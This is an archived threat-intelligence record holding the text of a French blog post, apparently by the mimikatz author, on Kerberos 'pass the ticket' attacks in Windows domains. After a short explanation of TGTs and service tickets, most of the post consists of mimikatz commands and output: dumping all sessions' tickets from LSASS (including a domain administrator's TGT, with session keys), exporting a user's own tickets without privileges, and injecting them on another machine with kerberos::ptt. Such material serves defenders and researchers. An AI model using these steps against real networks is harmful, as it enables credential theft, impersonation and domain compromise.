{
	"id": "c51f30d4-f27c-42d3-9ace-fed09fd6d319",
	"created_at": "2026-04-06T00:14:16.784116Z",
	"updated_at": "2026-04-10T13:11:31.572268Z",
	"deleted_at": null,
	"sha1_hash": "d027e99de185a2d5bd268c34ae1572d443fe5c17",
	"title": "Pass the ticket | Blog de Gentil Kiwi",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 291090,
	"plain_text": "Pass the ticket | Blog de Gentil Kiwi\r\nPublished: 2014-01-13 · Archived: 2026-04-05 12:59:51 UTC\r\nLe gardien des Enfers (Κέρϐερος) de Microsoft\r\nmimikatz permettait la récupération de deux type de données d’authentification :\r\nles hashs, réutilisables dans Windows via « Pass the hash »\r\nles mots de passe, directement réutilisables dans Windows\r\nPuis, un document très intéressant de Microsoft est apparu : http://www.microsoft.com/download/details.aspx?\r\nid=36036. Il nous apprend entre autres :\r\nque les attaques par « Pass the hash » ont encore de très beaux jours devant elles ;\r\nqu’il est normal de retrouver des mots de passe dans le processus LSASS ;\r\nqu’à partir d’un environnement Windows 7, NTLM peut être désactivé sur un parc maitrisé et homogène\r\n(sécurité pour maquettes ;)\r\nMais ce document rappelle aussi que Kerberos reste autant vulnérable à l’extraction de données que les autres\r\nfournisseurs de sécurité…\r\nKerberos sous Windows, les bases\r\nKerberos repose sur l’utilisation de tickets, chiffrés, ayant des durées d’utilisation et de renouvellement\r\nprédéfinies.\r\nDans un environnement Windows, les secrets partagés restent les hash des comptes (!), la clé du KDC est le hash\r\ndu compte krbtgt (http://msdn.microsoft.com/library/windows/desktop/aa378170.aspx).\r\nhttps://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos\r\nPage 1 of 7\n\nContrairement aux autres protocoles d’authentification, Kerberos fonctionne uniquement dans le cadre d’un\r\ndomaine et en utilisant les noms de serveurs.\r\nVoici un très bon schéma de Microsoft résumant l’authentification d’un client, l’obtention d’un TGT (Ticket\r\nGranting Ticket), la demande d’un ticket de service, et son utilisation.\r\nSource : http://technet.microsoft.com/library/bb742516.aspx\r\nIl y a donc deux types de tickets intéressants :\r\nles TGT – représentant les utilisateurs – ils permettent d’obtenir des Tickets de services auprès d’un TGS\r\n(Ticket Granting Service)\r\n1\r\n2\r\n3\r\n4\r\n5\r\n[00000001] - 12\r\nStart/End/MaxRenew: 13/01/2014 01:13:30 ; 13/01/2014 11:13:30 ; 20/01/2014\r\n01:13:30\r\nServer Name : krbtgt/DOMAIN.LOCAL @ DOMAIN.LOCAL\r\nClient Name : user2 @ DOMAIN.LOCAL\r\nFlags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ;\r\nforwardable ;\r\nTGT identifiant user2 sur le domain DOMAIN.LOCAL , valide pendant 10h00 et renouvelable pendant 1\r\nsemaine\r\nhttps://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos\r\nPage 2 of 7\n\nPar défaut, Windows ne permet pas leurs export aux utilisateurs (il remplacera la clé de session par une clé\r\nnulle, rendant son utilisation impossible).\r\nUn paramètre doit être positionné ( allowtgtsessionkey ) par un administrateur pour qu’un utilisateur\r\npuisse récupérer son TGT : http://support.microsoft.com/kb/308339\r\nles Tickets de service : ils permettent d’accéder à une ressource (partage, service web, annuaire) sur un\r\nserveur précis\r\n1\r\n2\r\n3\r\n4\r\n5\r\n[00000002] - 17\r\nStart/End/MaxRenew: 13/01/2014 01:15:48 ; 13/01/2014 11:13:30 ; 20/01/2014\r\n01:13:30\r\nServer Name : cifs/pc-81.domain.local @ DOMAIN.LOCAL\r\nClient Name : user2 @ DOMAIN.LOCAL\r\nFlags 40a10000 : name_canonicalize ; pre_authent ; renewable ; forwardable ;\r\nTicket de service identifiant user2 pour un service de partage ( cifs ) sur le serveur ( pc-81.domain.local ), valide pendant 10h00 et renouvelable pendant 1 semaine\r\nCette fois ci, un utilisateur lambda peut récupérer ses propres tickets sans droits particuliers…\r\nManipulons les tickets\r\nVia l’appel au Package d’authentification Kerberos ( LsaCallAuthenticationPackage ), Microsoft nous offre des\r\nstructures permettant de manipuler les tickets Kerberos :\r\nhttp://msdn.microsoft.com/library/windows/desktop/aa378099.aspx.\r\nLe message permettant d’injecter un ticket arbitraire de type KRB-CRED dans notre session est :\r\nKerbSubmitTicketMessage (celui ci n’est pas disponible sous XP ou 2003).\r\nIl ne nécessite aucun droit particulier pour injecter des ticket dans notre propre session.\r\nLa récupération depuis le processus LSASS de tous les tickets, de toutes les sessions, et de toutes les clés\r\nnécessite en revanche les droits administrateurs ou SYSTEM (et dans ce cas le privilège Debug devient inutile)\r\n1. Récupérons tous les tickets sur un Terminal Server, ou une station sensible\r\n1\r\n2\r\n3\r\n4\r\nmimikatz # privilege::debug\r\nPrivilege '20' OK\r\nmimikatz # sekurlsa::tickets /export\r\nAuthentication Id : 0 ; 2747917 (00000000:0029ee0d)\r\nhttps://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos\r\nPage 3 of 7\n\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\nSession : Interactive from 2\r\nUser Name : userlocaladmin\r\nDomain : DOMAIN\r\nTickets group 0\r\n[00000000]\r\nStart/End/MaxRenew: 13/01/2014 01:44:15 ; 13/01/2014 11:44:10 ;\r\n20/01/2014 01:44:10\r\nService Name (02) : LDAP ; dc-2012r2-x.domain.local ; domain.local ; @\r\nDOMAIN.LOCAL\r\nTarget Name (02) : LDAP ; dc-2012r2-x.domain.local ; domain.local ; @\r\nDOMAIN.LOCAL\r\nClient Name (01) : userlocaladmin ; @ DOMAIN.LOCAL ( DOMAIN.LOCAL )\r\nFlags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ;\r\nrenewable ; forwardable ;\r\nSession Key (12) : 6b 96 7b 29 70 03 a5 45 f6 e4 1a 25 5c a1 bf 0d 35\r\n0a d5 db 86 ab 7e 5f be 67 3e f8 2b 05 d6 3d\r\nTicket (03 - 12) : [...]\r\n* Saved to file [0;29ee0d]-0-0-40a50000-userlocaladmin@LDAP-dc-2012r2-\r\nx.domain.local.kirbi !\r\n[...]\r\nAuthentication Id : 0 ; 2628340 (00000000:00281af4)\r\nSession : Interactive from 1\r\nUser Name : user1\r\nDomain : DOMAIN\r\n[...]\r\nAuthentication Id : 0 ; 1873488 (00000000:001c9650)\r\nSession : Interactive from 3\r\nUser Name : Administrateur\r\nhttps://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos\r\nPage 4 of 7\n\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n40\r\n41\r\n42\r\n43\r\nDomain : DOMAIN\r\n[...]\r\nTickets group 2\r\n[00000000]\r\nStart/End/MaxRenew: 13/01/2014 00:57:49 ; 13/01/2014 10:57:49 ;\r\n20/01/2014 00:57:49\r\nService Name (02) : krbtgt ; DOMAIN.LOCAL ; @ DOMAIN.LOCAL\r\nTarget Name (02) : krbtgt ; DOMAIN.LOCAL ; @ DOMAIN.LOCAL\r\nClient Name (01) : Administrateur ; @ DOMAIN.LOCAL ( DOMAIN.LOCAL )\r\nFlags 40e10000 : name_canonicalize ; pre_authent ; initial ;\r\nrenewable ; forwardable ;\r\nSession Key (12) : 76 7b db 67 1d 2e a7 8c a3 39 b5 12 a2 c1 27 cd ac\r\n7d d9 04 20 fa a3 a8 2d 70 3e 9c 1e e3 3b d1\r\nTicket (02 - 12) : [...]\r\n* Saved to file [0;1c9650]-2-0-40e10000-Administrateur@krbtgt-DOMAIN.LOCAL.kirbi !\r\nOui, cela fonctionne aussi avec les « minidumps ».\r\nUn Administrateur du domaine avait une session sur cette machine ;)\r\n2. Injectons, sur une autre machine ce TGT récupéré\r\n1\r\n2\r\nmimikatz # kerberos::ptt [0;1c9650]-2-0-40e10000-Administrateur@krbtgt-DOMAIN.LOCAL.kirbi\r\nTicket '[0;1c9650]-2-0-40e10000-Administrateur@krbtgt-DOMAIN.LOCAL.kirbi' successfully\r\nsubmitted for current session\r\nIl suffit de demander la parcours d’un partage pour qu’un Ticket de service ad hoc soit demandé en se\r\nbasant sur le TGT injecté.\r\nhttps://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos\r\nPage 5 of 7\n\nExport de ses tickets de services sans être administrateur\r\nEn se limitant à l’utilisateur courant, les tickets de services pourront être exportés sans droits particuliers. Ils\r\npeuvent dans certains cas être intéressants (prêt d’une session, poste non verrouillé, …)\r\n1. Récupérons les tickets sur poste/serveur disposant de l’accès désiré (ici partage de fichier sur PC-81 au\r\nnom d’ user2 )\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\nmimikatz # kerberos::list /export\r\n[00000002] - 17\r\nStart/End/MaxRenew: 13/01/2014 01:15:48 ; 13/01/2014 11:13:30 ; 20/01/2014\r\n01:13:30\r\nServer Name : cifs/pc-81.domain.local @ DOMAIN.LOCAL\r\nClient Name : user2 @ DOMAIN.LOCAL\r\nFlags 40a10000 : name_canonicalize ; pre_authent ; renewable ; forwardable ;\r\nhttps://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos\r\nPage 6 of 7\n\n8\r\n* Saved to file: 2-40a10000-user2@cifs~pc-81.domain.local-DOMAIN.LOCAL.kirbi\r\n2. Injectons, sur une autre machine le ticket de service ainsi récupéré\r\n1\r\n2\r\nmimikatz # kerberos::ptt 2-40a10000-user2@cifs~pc-81.domain.local-DOMAIN.LOCAL.kirbi\r\nTicket '2-40a10000-user2@cifs~pc-81.domain.local-DOMAIN.LOCAL.kirbi' successfully\r\nsubmitted for current session\r\nTéléchargement\r\nLa version alpha prenant en charge ces améliorations est disponible : http://blog.gentilkiwi.com/mimikatz\r\nSource: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos\r\nhttps://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "FR",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos"
	],
	"report_names": [
		"pass-the-ticket-kerberos"
	],
	"threat_actors": [],
	"ts_created_at": 1775434456,
	"ts_updated_at": 1775826691,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d027e99de185a2d5bd268c34ae1572d443fe5c17.pdf",
		"text": "https://archive.orkl.eu/d027e99de185a2d5bd268c34ae1572d443fe5c17.txt",
		"img": "https://archive.orkl.eu/d027e99de185a2d5bd268c34ae1572d443fe5c17.jpg"
	}
}